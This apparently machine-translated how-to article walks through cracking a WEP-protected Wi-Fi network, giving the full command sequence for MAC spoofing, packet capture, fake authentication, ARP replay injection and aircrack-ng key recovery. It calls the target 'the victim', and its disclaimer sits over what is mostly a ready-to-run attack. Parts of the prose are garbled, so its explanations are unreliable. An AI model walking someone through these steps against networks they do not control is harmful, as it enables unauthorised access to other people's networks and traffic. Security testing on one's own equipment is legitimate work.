How to hack a Wi-Fi network with WEP encryption

How to hack wifi? Many of us have heard that when you install Wi-Fi access point in any case it is impossible to choose WEP encryption, because it is very easily cracked. Probably, the unit tried to do it themselves, and about the same know how all this actually looks like. The following describes an option breaking point with encryption protocol, so you can more clearly understand how The real situation, when your super secret point someone to connect to, and that in general is similar to breaking. Of course, to use this on someone's strange router in any case impossible. This material is for informational purposes only, and calls for the abandonment of easily cracked encryption protocols.

To crack an attacker will need:

• suitable Wi-Fi adapter, with the injection packs (for example, Alfa AWUS036H)
• BackTrack Live CD
• in fact, your Wi-Fi access point with WEP, which will put the experiment
• patience

After you run the command line BackTrack called Konsole, type the following command:

airmon-ng

You'll see your network interface that will be called «ra0» or something like this. Remember this name. In the future, it will be referred to as (interface), and you replace it in your name. Next, type 4 lines sequentially:

airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00: 11: 22: 33: 44: 55 (interface)
airmon-ng start (interface)

We now have the MAC address of the fake web. enter:

airodump-ng (interface)

Will start to appear a list of available wireless networks. Once the list shows the desired network, you can press Ctrl + C to stop the search. You need to copy the BSSID of the network and store channel (stobets CH). Also make sure that the column ENC Set is WEP.

Now we start to collect the information from this network:

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

channel - a channel of the column CH, file name - file name in which everything is written, well bssid - a network identifier.

You will see something similar to what is shown in the screenshot. Leave this window as is. Open a new window Konsole and type:

aireplay-ng -1 0 -a (bssid) -h 00: 11: 22: 33: 44: 55 -e (essid) (interface)

essid - SSID network name of the victim.

«Association successful» We are waiting for the appearance of the message.

Next, type:

aireplay-ng -3 -b (bssid) -h 00: 11: 22: 33: 44: 55 (interface)

Now you need to show all his patience and wait for the numbers in the column will not go #Data mark of 10,000.

Upon reaching the required number of collected data open the third window Konsole and type:

aircrack-ng -b (bssid) (file name-01.cap)

As the name entered by you previously selected a name for the file.

If successful, you will see a line «KEY FOUND», and which contains the key to the network.